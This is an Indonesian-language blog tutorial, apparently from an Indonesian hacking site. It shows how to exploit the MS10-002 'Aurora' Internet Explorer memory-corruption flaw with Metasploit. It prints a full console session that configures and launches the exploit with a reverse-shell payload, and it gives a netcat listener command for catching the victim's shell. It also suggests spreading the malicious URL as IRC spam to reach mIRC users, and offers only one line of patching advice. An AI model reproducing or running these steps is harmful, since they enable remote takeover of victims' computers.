Sebenarnya ini teknik lama yang cukup populer di jaman dulu tapi
tidak ada salahnya penulis membahasnya. Umumnya target dengan celah
keamanan browser adalah salah satu sasaran empuk untuk dimanfaatkan
oleh peretas, apalagi yang masih menggunakan Internet explorer, bahkan
Internet explorer 8 dengan Windows 7 pun tidak kalah terancamnya untuk
diobok-obok, dimana penulis telah membuat tutorialnya tahun lalu di
http://blog.xcode.or.id/?p=209.
Disini penulis contohkan saja bagi pengguna Windows XP SP2 atau SP3
yang masih menggunakan IE 6, dimana begitu mudah diexploitasi dengan
celah memory corruption yang ada pada komponen “Operation Aurora”,
Microsoft merilis bulletinnya tentang ini pada bulan Januari 2010 di
http://technet.microsoft.com/en-us/security/bulletin/ms10-jan.
Disini penulis langsung saja contoh mempraktekkannya di lingkungan LAN.
Dalam Metasloit Framework :
_———.
.’ ####### ;.”
.—,. ;@ @@`; .—,..
.” @@@@@’.,’@@ @@@@@’,.’@@@@ “.
‘-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .’
“–’.@@@ -.@ @ ,’- .’–”
“.@’ ; @ @ `. ;’
|@@@@ @@@ @ .
‘ @@@ @@ @@ ,
`.@@@@ @@ .
‘,@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@’. __*__,.” \|— \_____________/
‘(.,….”/
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 717 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 303 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 303 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf exploit(ms10_002_aurora) > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.3
msf exploit(ms10_002_aurora) > set SRVPORT 80
PAYLOAD => generic/shell_reverse_tcp
LHOST => 192.168.1.3
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to 192.168.1.3:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.79:80/
[*] Server started.
[*] Sending Internet Explorer “Aurora” Memory Corruption to client 192.168.1.79
Disini LHOST IP-nya 192.168.1.3 adalah komputer attacker, dengan
konsep reverse maka korban akan mengkoneksikkan diri ke komputer
attacker setelah menjalankan exploit, jika target attacker di internet
ya cukup attacker memasukkan IP Publiknya.
IP 192.168.1.79 adalah ip dimana attacker menjalankan metasploit
frameworknya, disini pas kebetulan berbeda IP antara komputer attacker
dengan komputer yang untuk menjalankan metasploit framework.
Sebelum proses exploitasi dilakukan maka attacker menjalankan
terlebih dahulu netcat untuk siap menerima koneksi dari target ketika
target menjalankan exploit dengan menggunakan browser.
Perintahnya : nc -l -v -p 4444
Ketika target membuka http://192.168.1.79 seperti dibawah ini maka
browser target menjalankankan exploit yang ada di komputer dengan IP
192.168.1.79.
Dengan sebelumnya attacker telah menjalankan netcat maka attacker
akan langsung mendapatkan shell target setelah target menjalankan url
tersebut. Untuk pengamanan pada IE anda dapat melakukan update pada IE
versi terbaru yang tidak memilih celah remote seperti diatas.
Untuk selain IE juga ada yang lain seperti Mozilla Firefox, chrome,
opera, safari dan sebagainya yang dapat anda cari sendiri di situs
exploit-db.com
Untuk IE celah ini dapat dimanfaatkan attacker di server-server
Internet Relay Chat berupa spam yang isinya exploit, karena ketika
client pengguna mIRC di Windows menjalankan spam dengan double klik pada
url maka yang dibuka otomatis adalah IE untuk menjalankan url tersebut,
karena itu jangan pernah meremehkan IE yang ada di komputer anda
meskipun anda berkeyakinan tidak akan membuka situs menggunakan IE
karena IE dapat membuka situs otomatis tanpa anda minta menggunakan IE
seperti kasus yang saya sampaikan diatas.
Sumber: blog.xcode.or.id